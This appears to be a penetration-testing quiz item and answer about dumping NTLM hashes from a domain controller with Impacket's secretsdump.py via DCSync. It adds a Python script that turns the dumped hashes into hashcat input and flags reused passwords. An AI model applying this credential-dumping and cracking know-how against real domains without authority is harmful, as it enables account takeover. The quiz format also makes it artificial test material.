During a post-exploitation phase you have local Administrator rights on a Windows 10 workstation inside contoso.local. You want to retrieve NTLM password hashes from the domain controller DC01 over the network, without copying the NTDS.dit file, so you can crack them offline later. You have Impacket installed on your attacker machine and prefer to use the DCSync technique. Which Impacket example script should you run to accomplish this goal?
secretsdump.py is the right choice. Given credentials for an account that holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain (by default Domain Admins, Enterprise Admins and the domain controllers themselves), it connects to DC01 over the DRSUAPI (MS-DRSR) RPC interface and asks the DC to replicate account secrets exactly as a peer domain controller would; that is the DCSync technique, and it is the script's default method for NTDS secrets. The -just-dc flag skips the SAM and LSA dump of the target itself, -just-dc-ntlm limits the output to NTLM hashes, and -user-status appends whether each account is enabled. The resulting lines (domain\user:rid:lmhash:nthash:::) can be fed directly to hashcat or John. Two caveats a practitioner will want: local Administrator rights on a workstation are not enough on their own, since DCSync needs domain credentials of a replication-privileged account (a password, an NT hash for pass-the-hash via -hashes, or a Kerberos ticket via -k); and secretsdump.py's -use-vss option is the opposite approach, pulling a shadow copy of NTDS.dit over SMB, so it is not what the scenario asks for. The other scripts offered serve different purposes: wmiexec.py gives a semi-interactive command shell over WMI, smbclient.py is an SMB file-share client, and addcomputer.py creates or modifies computer accounts in Active Directory rather than dumping credentials.
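As an added example (not Impacket's code and not part of the original answer), the script below triages the output secretsdump.py prints for a -just-dc-ntlm -user-status dump before it goes to the cracker: it parses the domain\user:rid:lmhash:nthash::: lines, drops machine accounts, disabled accounts and empty-password accounts, emits hashcat -m 1000 input, and flags NT hashes shared by several users. The sample output is constructed, not captured from a real domain; the contoso.local names, RIDs and hashes are illustrative (8846f7eaee8fb117ad06bdd830b7586c is the well-known NT hash of "password", the others are arbitrary).

```python
"""Triage secretsdump.py DCSync output before offline cracking.

Added example, not part of Impacket. It assumes the line format that
secretsdump.py prints for a -just-dc-ntlm dump with -user-status:
    domain\\user:rid:lmhash:nthash::: (status=Enabled|Disabled)
"""
import re
from collections import defaultdict

# NT hash of the empty string: the account has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash of the empty string: LM storage is disabled, as on any modern domain.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample output, not captured from a real domain. It mimics e.g.
#   secretsdump.py -just-dc-ntlm -user-status contoso.local/da_user@DC01
SAMPLE_OUTPUT = """\
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
contoso.local\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
contoso.local\\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
contoso.local\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c4f1a27f8e4d6fcb8de4c5a1a0a9b6d1::: (status=Disabled)
contoso.local\\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c::: (status=Enabled)
contoso.local\\svc_backup:1201:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef::: (status=Enabled)
contoso.local\\WS01$:1106:aad3b435b51404eeaad3b435b51404ee:e9a1b0c2d3f4a5b6c7d8e9f0a1b2c3d4::: (status=Enabled)
[*] Cleaning up...
"""

# One dumped account per line; the domain prefix and status suffix are optional.
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
    r"(?:\s*\(status=(?P<status>\w+)\))?\s*$"
)


def parse_secretsdump(text):
    """Return one dict per account line; [*] progress lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # "[*] ..." status output, Kerberos key lines, blanks
        rec = m.groupdict()
        rec["rid"] = int(rec["rid"])
        rec["lm"] = rec["lm"].lower()
        rec["nt"] = rec["nt"].lower()
        rec["status"] = rec["status"] or "Unknown"
        records.append(rec)
    return records


def crack_candidates(records):
    """Accounts worth spending GPU time on: enabled, human, non-empty NT hash.

    Machine accounts (trailing $) have 120-character random passwords and do
    not crack; disabled accounts cannot be logged into; the empty-string hash
    is already known.
    """
    return [
        r for r in records
        if r["status"] != "Disabled"
        and not r["user"].endswith("$")
        and r["nt"] != EMPTY_NT
    ]


def hashcat_lines(records):
    """user:nthash lines for `hashcat -m 1000 --username`."""
    return [f"{r['user']}:{r['nt']}" for r in crack_candidates(records)]


def password_reuse(records):
    """Map each NT hash shared by more than one account to its users."""
    by_hash = defaultdict(list)
    for r in records:
        by_hash[r["nt"]].append(r["user"])
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(records):
    """Accounts whose NT hash is that of the empty string."""
    return [r["user"] for r in records if r["nt"] == EMPTY_NT]


if __name__ == "__main__":
    recs = parse_secretsdump(SAMPLE_OUTPUT)
    print(f"{len(recs)} accounts dumped, {len(crack_candidates(recs))} worth cracking")
    print("\n".join(hashcat_lines(recs)))
    for h, users in password_reuse(recs).items():
        print(f"shared hash {h}: {', '.join(users)}")
    print("empty passwords:", empty_password_accounts(recs))
```

Feed real output in through -outputfile (secretsdump.py writes the NTDS lines to a .ntds file) instead of the constructed sample. Identical NT hashes across accounts are worth noting before cracking starts: cracking one of them yields the others, and a privileged account sharing a hash with a standard user is a finding on its own.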